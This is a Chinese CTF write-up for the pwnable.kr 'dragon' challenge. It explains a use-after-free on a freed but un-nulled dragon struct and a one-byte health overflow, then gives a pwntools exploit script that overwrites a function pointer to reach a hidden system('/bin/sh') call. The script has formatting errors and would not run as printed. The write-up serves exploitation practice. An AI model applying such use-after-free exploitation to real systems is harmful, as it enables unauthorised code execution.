Dragon —— 堆之 uaf

开始堆的学习之旅。

  uaf漏洞利用到了堆的管理中fastbin的特性,关于堆的各种分配方式参见堆之*bin理解

  在SecretLevel函数中,发现了隐藏的system("/bin/sh")调用,虽然无法直接执行,但无疑会是后续进展中的有力武器。

  在和恐龙战斗的函数结束部分,发现了free掉但没有置空的free(dragon)语句,而在对战胜利后恰有开辟相同大小的空间,并自主写入的部分,由此产生了uaf漏洞。

  >>在将dragon的结构体free之后,所指的内存空间会“挂”在fastbin数组下等待下次调用,而没有置空的、原来指向被free空间的dragon指针仍然指向该空间,仍可以在函数中被使用,而之后v2申请的大小和被free的空间的大小相同,会优先从fastbin数组中“摘下来”,此时v2和dragon指针都指向同一块内存空间,所以可以通过对v2的输入和对dragon的调用,实现任意代码执行,所以只要将之前的system(“/bin/sh”)段的地址写入v2,就能获得shell

  这个游戏无法通过正常操作获得胜利,但是龙的生命只有一个byte即最多达到127,不断增长的情况下就可能实现溢出导致生命为负,使用有无敌和回技能点的第一个英雄配合母龙很容易达到。

exp:

 #!/usr/bin/env python
# -*-coding=utf-8-*-
from pwn import *
# context.log_level = 'debug'
# io = process("./dragon")
io = remote("pwnable.kr",9004)
elf = ELF("./dragon") binsh = 0x804935c
sys_addr = elf.symbols["system"]
call_sys = 0x8048dbf
# to pretend to be defeated at first
io.recvuntil("night\n")
io.sendline("")
io.recvuntil("cible.\n")
io.sendline("")
io.recvuntil("cible.\n")
io.sendline("")
io.recvuntil("night\n")
io.sendline("")
# to track the mom dragon come out and make it overflow
for i in range (4):
io.recvuntil("ble.\n")
io.sendline("")
io.recvuntil("ble.\n")
io.sendline("")
io.recvuntil("ble.\n")
io.sendline("")
io.recvuntil("As:\n")
# payload = p32(sys_addr) + p32(binsh)
payload = p32(call_sys) + '\x00'*8
io.send(payload)
io.interactive()
05-20 19:37